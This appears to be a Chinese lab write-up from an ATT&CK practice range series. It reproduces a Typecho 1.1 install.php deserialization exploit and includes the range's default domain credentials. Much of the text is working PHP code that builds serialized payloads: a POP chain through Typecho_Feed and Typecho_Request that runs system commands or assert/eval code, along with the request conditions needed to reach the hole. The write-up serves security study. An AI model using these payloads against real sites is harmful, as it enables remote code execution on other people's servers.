ATT&CK(六)
data:image/s3,"s3://crabby-images/2c407/2c407fd042d6addfa569a9c215cbc4ea9daa1dab" alt="image-20221003115344248"
data:image/s3,"s3://crabby-images/70686/706862f1f2948f397601068ae6819e433732e49b" alt="image-20221003120238502"
data:image/s3,"s3://crabby-images/9b882/9b882a555a1f8ec180ee956bcdc03e49e1c99f4a" alt="image-20221003120248230"
V3.2 web\de1ay | 1qaz!QAZ1qaz!QAZ de1ay\de2ay | 1qaz@WSX!QAZ2wsx de1ay\Administrator | 1qaz@WSX
|
搭建typecho
data:image/s3,"s3://crabby-images/10291/10291512631561f26d6ed340abcee6baaca70048" alt="image-20221003164902664"
data:image/s3,"s3://crabby-images/2b067/2b0676901c40ffbe97d1c7e1e34dd8a2a7f7d8be" alt="image-20221003164931905"
data:image/s3,"s3://crabby-images/fae1e/fae1e92ac55cccf63df61708b903b4c69b17408f" alt="image-20221003120259479"
然后启动就好了 之后用
de1ay\Administrator | 1qaz@WSX
|
登录
data:image/s3,"s3://crabby-images/0a50f/0a50fbb139b993337c12403f66f87ab757b4ac7c" alt="image-20221003194217769"
data:image/s3,"s3://crabby-images/fec1c/fec1c2c78350cf15e0d6dd98b56b7182bb44a9bd" alt="image-20221003194401161"
data:image/s3,"s3://crabby-images/a6973/a6973d5d1c74daf17023b22cb24dfcfd40b1f5a2" alt="image-20221003194417099"
data:image/s3,"s3://crabby-images/91bb3/91bb3cc730865d82be67b41a57e97c96cf3e7cbc" alt="image-20221003194446628"
data:image/s3,"s3://crabby-images/bb0a2/bb0a23ea333552aa3224c9a908d47162459349d2" alt="image-20221003194429349"
更改端口为2000
发现数据库有问题
data:image/s3,"s3://crabby-images/ae98f/ae98f3c7ddbe1e1040d5c9931139cea2391abfdc" alt="image-20221003194601845"
这里进去之后发现没有这个 typecho 数据库
data:image/s3,"s3://crabby-images/497b5/497b5ef67706d3edb492590ca2a450d08ac8b015" alt="image-20221003195448107"
重新安装一下吧
下载 typecho
https://github.com/typecho/typecho/releases/download/v1.1-15.5.12-beta/typecho.tar.gz
先将 typecho下的文件全部删除 接着将 build下的文件全部复制进去
data:image/s3,"s3://crabby-images/29ca9/29ca9c0b50d87d7e6657050e3b93170d6d697084" alt="image-20221003201324642"
添加typecho数据库
data:image/s3,"s3://crabby-images/f87a9/f87a9227c029dadc5a5f4f5f4c83d94065c59208" alt="image-20221003201040477"
data:image/s3,"s3://crabby-images/a6179/a61790e66448251c1e95292c08e6fa5b26629142" alt="image-20221003201411958"
data:image/s3,"s3://crabby-images/a13e0/a13e0a57d3213d957dd630dc98c59b298ded58f9" alt="image-20221003201419877"
data:image/s3,"s3://crabby-images/530de/530debe692a6a5e8c354d77d6acced904d90840f" alt="image-20221003201827639"
审计typecho
接着我们审计一下typecho
反序列化点在install.php 那么我们需要先到达反序列化点
data:image/s3,"s3://crabby-images/18bec/18bec95c143e34534c213881cefa80fa0ef99409" alt="image-20221003220149267"
这里的第一个if 只需要添加上 finish参数即可绕过
data:image/s3,"s3://crabby-images/964d4/964d4f218ae9588e3eae26f374756552791d7b6c" alt="image-20221003220307593"
第二个if需要添加一个本站的 referer
data:image/s3,"s3://crabby-images/5a222/5a222609edd5f5ff79d4a6cd7c5ea31f0888ccb7" alt="image-20221003221530809"
这里还需要有一个 cookie __typecho_config
data:image/s3,"s3://crabby-images/be6ad/be6add8fe2e971e873f0734cb7a53d5b3f4bce2b" alt="image-20221003221954907"
注意这里需要抓包修改
data:image/s3,"s3://crabby-images/fcee5/fcee58feab93b388e8b60a014662ce6ec1e8450d" alt="image-20221003222435806"
到达反序列化点 通过这里可以发现这个反序列化点反序列化的参数其实就是cookie 的 __typecho_config
data:image/s3,"s3://crabby-images/23c6e/23c6e3ddfa3f75952603bbeb54077666002f7c4e" alt="image-20221003222510297"
这里简单构造下 把反序列化的对象设定为 数组 在new Typecho_Db 的时候会进入它的构造方法
<?php $o = array( "adapter" => "", "prefix"=>"123" ); echo base64_encode(serialize($o));
|
这里可见这个 $adapterName 可控
data:image/s3,"s3://crabby-images/052cf/052cf2c68a1d0c1711ec58a7427e7def61ffe821" alt="image-20221003224139122"
这里进行了字符串的拼接操作,那么我们很容易想到 如果拼接的是一个对象的话 这里就可以调用__toString() 方法了 这里选择了 Typecho_Feed 类
data:image/s3,"s3://crabby-images/8ac3e/8ac3e6cb54210489f474f4ad615a109c78331a58" alt="image-20221003224013093"
<?php class Typecho_Feed{
} $o = array( "adapter" => new Typecho_Feed(), "prefix"=>"123" ); echo base64_encode(serialize($o));
|
data:image/s3,"s3://crabby-images/a195b/a195bf11c57d27606034cab5e23ceca9c9a3b4ff" alt="image-20221003224402152"
下一步我们需要到这里 那么这里需要先过 else if
data:image/s3,"s3://crabby-images/21d2d/21d2d481e9eb76694d035023ab48970d339fc10c" alt="image-20221003224902633"
我们需要给_type赋值为 RSS 2.0
data:image/s3,"s3://crabby-images/b4a33/b4a335bc417e1732ce0f7bdf0db3d3b82a0d9a4f" alt="image-20221003224955687"
这里是个private属性 我们采用 __construct 方法构造
data:image/s3,"s3://crabby-images/11ce7/11ce7f0d6174c9517eadd801b0574b36c8aa0676" alt="image-20221003225104934"
这里还需要过 foreach循环
data:image/s3,"s3://crabby-images/bd065/bd065f0cb9b3b590bf0db80cb56800f685f63ace" alt="image-20221003225352626"
<?php class Typecho_Feed{ private $_type; private $_items = array(); public function __construct() { $this->_type = "RSS 2.0"; $this->_items = array( array( "author"=>"aaa" ) ); }
} $o = array( "adapter" => new Typecho_Feed(), "prefix"=>"123" ); echo base64_encode(serialize($o));
|
data:image/s3,"s3://crabby-images/ef9cf/ef9cf358340f59dd27deac776906acafbf0a0eca" alt="image-20221003230433849"
这里的 $item[‘author’] 是可以控制的 这里调到了Request 的 __get()
<?php class Typecho_Request{
} class Typecho_Feed{ private $_type; private $_items = array(); public function __construct() { $this->_type = "RSS 2.0"; $this->_items = array( array( "author"=>new Typecho_Request() ) ); }
} $o = array( "adapter" => new Typecho_Feed(), "prefix"=>"123" ); echo base64_encode(serialize($o));
|
data:image/s3,"s3://crabby-images/82256/82256ccfafffd52a4b62e344669776b84274d90d" alt="image-20221003231905783"
这里call_user_func 需要给两个参数赋值
data:image/s3,"s3://crabby-images/d00f8/d00f8b74f9b59e79882299672996792497e1ccda" alt="image-20221003232104055"
从这里给 value 赋值
data:image/s3,"s3://crabby-images/84442/844429769023e09c4d6c7d97c22f0add4bfcc359" alt="image-20221003232405565"
<?php class Typecho_Request{ private $_params = array(); private $_filter = array(); public function __construct() { $this->_params = array( "screenName"=>"ipconfig" ); $this->_filter = array("system"); }
} class Typecho_Feed{ private $_type; private $_items = array(); public function __construct() { $this->_type = "RSS 2.0"; $this->_items = array( array( "author"=>new Typecho_Request() ) ); }
} $o = array( "adapter" => new Typecho_Feed(), "prefix"=>"123" ); echo base64_encode(serialize($o));
|
这里可以看到其实是有执行的 但是呢会爆500错误
data:image/s3,"s3://crabby-images/e7bc7/e7bc7a1d9dfff03e9ca07f8075dba60377a9249d" alt="image-20221004132231927"
原因就是这里执行完成之后会抛出异常
data:image/s3,"s3://crabby-images/5b525/5b5251d2532c3afd294b97c85b841ecac1c39d0e" alt="image-20221004132529401"
而在 install.php 刚开始时调用了 ob_start()
data:image/s3,"s3://crabby-images/7c34e/7c34e41365dcbb668b3669aae34d592f43d8a191" alt="image-20221004132627315"
抛出异常之后便调用了 ob_end_clean()
data:image/s3,"s3://crabby-images/64763/647635520e52d12cb2f0232f750b9cff6b68559d" alt="image-20221004132652547"
官方对 ob_start的解释
data:image/s3,"s3://crabby-images/3372d/3372d3364ec8d8e542a6ad9f52cc8f28bb8f1877" alt="image-20221004133013392"
这里有两个方法 第一个就是call_user_func 函数处是一个循环,我们可以通过设置数组来控制第二次执行的函数,然后找到一处exit跳出,缓冲区的数据就会被输出出来 第二个就是在命令执行之后,想办法找到一个报错,语句报错就会强制停止,这样在缓存区的语句也会输出出来
这里选择了这里进行出现错误退出代码
data:image/s3,"s3://crabby-images/5d9c2/5d9c23f6111c648a5269011ecfccbc87ee822c8e" alt="image-20221004134723539"
<?php class Typecho_Request{ private $_params = array(); private $_filter = array(); public function __construct() { $this->_params = array( "screenName"=>"ipconfig" ); $this->_filter = array("system"); }
} class Typecho_Feed{ private $_type; private $_items = array(); public function __construct() { $this->_type = "RSS 2.0"; $this->_items = array( array( "author"=>new Typecho_Request(), "category"=>array(new Typecho_Request()) ) ); }
} $o = array( "adapter" => new Typecho_Feed(), "prefix"=>"123" ); echo base64_encode(serialize($o));
|
data:image/s3,"s3://crabby-images/a7bf9/a7bf9c176ddfb1c670eb76fccd93b2f6531eb5b3" alt="image-20221004134809522"
call_user_func 这里值得注意是是 第一个参数只能传入 assert 不能传入 eval 并且 在PHP7.1版本以后, assert()默认不再可以执行代码 就像echo一样 降低php版本为 7.0 的话可以使用assert
<?php class Typecho_Request{ private $_params; private $_filter; public function __construct() { $this->_params = array('screenName'=>'eval(\'phpinfo();exit();\')'); $this->_filter = array("assert"); }
} class Typecho_Feed{ private $_type; private $_items ; public function __construct() { $this->_type = "RSS 2.0"; $this->_items[] = array( "author"=>new Typecho_Request() ); }
} $o = array( "adapter" => new Typecho_Feed(), "prefix"=>"123" ); echo base64_encode(serialize($o));
|
data:image/s3,"s3://crabby-images/438d5/438d53b28fbfd75ac15ab0a5f573df2e3be66583" alt="image-20221004145432656"